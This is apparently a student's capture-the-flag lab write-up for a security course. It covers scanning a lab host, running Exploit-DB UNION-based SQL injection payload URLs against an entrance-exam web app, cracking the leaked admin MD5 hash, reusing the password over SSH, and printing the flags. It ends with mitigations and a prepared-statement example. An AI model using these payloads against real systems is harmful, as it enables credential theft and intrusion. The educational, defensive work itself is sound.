Lab 9.2 ‐ Exploiting Gloin ‐ JM - Jacob-Mayotte/SEC335_Tech_Journal GitHub Wiki
Target: gloin.shire.org
Target IP: 10.0.5.31
To retrieve the IP address associated with gloin.shire.org I utilize: sudo nslookup gloin.shire.org 10.0.5.22
IP Address of the machine is: 10.0.5.31
Open Ports:
Initially I used: sudo nmap 10.0.5.31 to just see what information a default scan would expose:
Knowing that there were open ports, I proceeded with a service/version/traceroute/script detection scan: sudo nmap 10.0.5.31 -A. The scan provided:
Info summarized:
| Open Port | State | Service | Version |
|---|---|---|---|
| 22/tcp | open | ssh | OpenSSH for_windows_7.7 (protocol 2.0) |
| 443/tcp | open | https | Apache httpd 2.4.51 ((Win64) OpenSSL/1.1.1l PHP/7.3.31) |
| 3389/tcp | open | ms-wbt-server | Microsoft Terminal Services |
Discovered Vulnerability:
The Nmap scans exposed that the machine is running SSH, HTTPS, and RDP. The scan had a 92% positive guess towards the OS of the machine being Windows. Now I had somewhere to start looking for vulnerabilities, but before doing that, since I knew HTTPS was enabled, I wanted to see if I was able to access 10.0.5.31, which brought me to a very basic, online Entrance Exam page:
It seems that a user can enter a "Reference Code" to take an exam. I really was unsure of where to proceed from here so I decided to use my good ol' friend, Google. I searched: online entrance exam reference code exploit
And found:
I explored the top link: https://www.exploit-db.com/exploits/50398 and was greeted with very useful information:
```
# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection
# Date: 07.10.2021
# Exploit Author: Amine ismail @aminei_
# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code
# Version: 1.0
# Tested on: Windows 10, Kali Linux
# Multiple SQL injections
The following PoCs will leak the admin username and password:
Unauthenticated:
http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
Admin:
http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
```
**SOURCE:** https://www.exploit-db.com/exploits/50398 author: Amine ismail @aminei_
As the exploit said, there are multiple SQL injections possible, so I tried each via the URL field:
Unauthenticated:
https://10.0.5.31/entrance_exam//take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list;
Which was extremely exciting because I was greeted with the following:
Admin:
https://10.0.5.31/entrance_exam//admin/view_enrollee.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
How you achieved a foothold:
From this SQLi that I ran, https://10.0.5.31/entrance_exam//admin/view_enrollee.php?id=1%27+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;, it became clear to me that the "email" listed, 4214db3884e9cd913b49b5b44e49ae96, wasn't really an email. Then the other SQLi provided me with the same string. I believe that it is a hash value hiding a valuable password.
I used crackstation.net and was provided with:
| Hash | Type | Result |
|---|---|---|
| 4214db3884e9cd913b49b5b44e49ae96 | MD5 | Moria2Featon6 |
See Reflection because I ran into a hiccup here.
Established foothold:
Now I knew I could enter the website with those credentials, but why not the actual system? I did a bit of researching and was able to find out that admin is not the username of an administrator account on Windows (I knew, or at least had a strong feeling, that this was Windows because of the earlier scans plus RDP being open). So I returned to the command line and retried SSH:
How you achieved root/Administrative level compromise:
Using the cmd line and ssh:
ssh [email protected] - Password: Moria2Featon6
User Flag: 3eb419b6-813d-4fcf-995e-b0b960c83457
To find the user flag I had to run:
ls C:\Users\ // trying to find a named Gloin user account
I noticed Gloin was there, so I switched into their directory, ran an ls, and found the userflag.txt file:
Root Flag: a7ce6b81-8c2b-4b67-931b-838d6e88cd95
Once ssh'd into the box I was able to just run ls from admin level and retrieve the root flag:
How might the vulnerabilities be mitigated by the systems administrator and developer?
- Stop reusing passwords.
Please stop. Especially between admin-based accounts (the website and the system). The org should implement a password manager to assist in avoiding the reuse of passwords. The PW manager will allow these dinguses to create complex passwords without worrying about forgetting them.
- Utilize Prepared Statements
Since this website is using a SQL database, the developer should have implemented prepared statements with parameterized queries. This means that the dev defines the SQL code first and passes the parameters to the query later, as bound values rather than as part of the SQL text. This prevents users from changing the intent of the query, no matter what SQLi payload is supplied!
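To make the prepared-statement point concrete, here is an added example (mine, not code from the lab or from the entrance-exam application) that mirrors the pattern in Python's built-in sqlite3 module, since the vulnerable app is PHP on SQLite. The schema, column names and the placeholder hash are constructed assumptions; the injected input has the same shape as the unauthenticated PoC quoted above. The string-concatenated query hands back the admin_list row for that input, while the parameterized query treats the same input as a plain id value and returns nothing.

```python
import sqlite3

# Constructed in-memory schema loosely modelled on what the page shows of the
# app (an admin_list table with username/password columns). Table layout,
# column names and the placeholder hash are assumptions for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE exam_list  (id INTEGER PRIMARY KEY, title TEXT, ref_code TEXT);
        CREATE TABLE admin_list (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO exam_list  VALUES (1, 'Entrance Exam', 'REF-001');
        INSERT INTO admin_list VALUES (1, 'admin', 'PLACEHOLDER_HASH');
    """)
    return conn

def take_exam_vulnerable(conn, exam_id):
    # The untrusted id is spliced into the SQL text, so a closing quote followed
    # by UNION SELECT changes the statement's shape and reads another table.
    sql = "SELECT id, title, ref_code FROM exam_list WHERE id = '" + exam_id + "'"
    return conn.execute(sql).fetchall()

def take_exam_safe(conn, exam_id):
    # Prepared statement: the SQL text is fixed up front and the id is bound as
    # a value, so whatever it contains is only ever compared against the id column.
    sql = "SELECT id, title, ref_code FROM exam_list WHERE id = ?"
    return conn.execute(sql, (exam_id,)).fetchall()

# Same shape as the unauthenticated PoC on the page: close the string literal,
# UNION in admin_list with a matching column count, comment out the trailing quote.
INJECTED_ID = "' UNION SELECT 1, username || ';' || password, 3 FROM admin_list --"

def compare(exam_id):
    """Run both variants on the same input and return their result rows."""
    conn = make_db()
    return {
        "vulnerable": take_exam_vulnerable(conn, exam_id),
        "safe": take_exam_safe(conn, exam_id),
    }

if __name__ == "__main__":
    for label, value in (("normal", "1"), ("injected", INJECTED_ID)):
        print(label, compare(value))
```

The fix is not escaping or filtering quotes; it is that the database driver compiles the statement before it ever sees the user's value, so the value cannot become SQL. The same applies in PHP through PDO::prepare/bindValue or SQLite3::prepare/bindValue.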
Reflection:
- Problems faced:
I was a bit stumped on where to go with the information I had gathered: admin, and Moria2Featon6, so I just kept trying different things but could not find a foothold.
I tried SSH first, but then kept getting denied entry. I thought I had valuable creds or values, so I kept searching for a different entry point. I returned to the exploit-db resource that I had found and reviewed the different file paths being used in the SQLi attacks and noticed:
Admin:
http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list;
/admin. I decided to mess with the URL and fortunately found this login page:
Then I was able to login:
This lab was really fun because I felt like I was using a culmination of knowledge learned from the last few weeks in this course and even others. I had a moment of scratching my head, which I described above, but as always Google never hurts. In the future I think I will try and start by gathering as much information relevant to the host as I can. Yes, I found the open ports, etc., but I should have used Google much earlier on the website name to try and find the exploit I ended up using. I think this is a valuable learning lesson though: conduct as much OSINT as possible before getting too far ahead of yourself. Ultimately though, this was really informative and connected a few dots in regard to the attacking process.